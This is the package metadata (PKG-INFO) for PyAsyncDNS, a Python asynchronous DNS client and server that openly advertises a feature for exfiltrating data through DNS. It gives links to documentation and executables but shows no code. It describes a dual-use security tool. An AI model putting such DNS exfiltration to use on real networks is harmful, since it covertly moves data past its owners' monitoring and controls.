Metadata-Version: 2.2
Name: PyAsyncDNS
Version: 0.0.3
Summary: This package implements a basic asynchronous DNS client and server with a feature to exfiltrate data through DNS.
Home-page: https://github.com/mauricelambert/PyAsyncDNS
Download-URL: https://mauricelambert.github.io/info/python/security/PyAsyncDNS.pyz
Author: Maurice Lambert
Author-email: Maurice Lambert <mauricelambert434@gmail.com>
Maintainer: Maurice Lambert
Maintainer-email: Maurice Lambert <mauricelambert434@gmail.com>
License: GPL-3.0 License
Project-URL: Github, https://github.com/mauricelambert/PyAsyncDNS
Project-URL: Documentation client, https://mauricelambert.github.io/info/python/security/PyAsyncDNS/client.html
Project-URL: Documentation server, https://mauricelambert.github.io/info/python/security/PyAsyncDNS/server.html
Project-URL: Documentation exfiltrator, https://mauricelambert.github.io/info/python/security/PyAsyncDNS/exfiltrator.html
Project-URL: Documentation exfiltrator server, https://mauricelambert.github.io/info/python/security/PyAsyncDNS/exfiltrator_server.html
Project-URL: Python Executable, https://mauricelambert.github.io/info/python/security/PyAsyncDNS/PyAsyncDNS.pyz
Project-URL: Windows Executable, https://mauricelambert.github.io/info/python/security/PyAsyncDNS/PyAsyncDNS.exe
Keywords: DNS,client,server,exfiltration,data-exfiltration,dns-client,dns-server,dns-exfiltration,asynchronous
Platform: Windows
Platform: Linux
Platform: MacOS
Classifier: Topic :: Security
Classifier: Environment :: Console
Classifier: Topic :: System :: Shells
Classifier: Operating System :: POSIX
Classifier: Natural Language :: English
Classifier: Topic :: System :: Networking
Classifier: Programming Language :: Python
Classifier: Intended Audience :: Developers
Classifier: Topic :: System :: System Shells
Classifier: Operating System :: MacOS :: MacOS X
Classifier: Programming Language :: Python :: 3.8
Classifier: Operating System :: Microsoft :: Windows
Classifier: Topic :: System :: Systems Administration
Classifier: Intended Audience :: System Administrators
Classifier: Development Status :: 5 - Production/Stable
Classifier: License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)
Requires-Python: >=3.8
License-File: LICENSE.txt
Dynamic: author
Dynamic: download-url
Dynamic: home-page
Dynamic: maintainer
Dynamic: requires-python
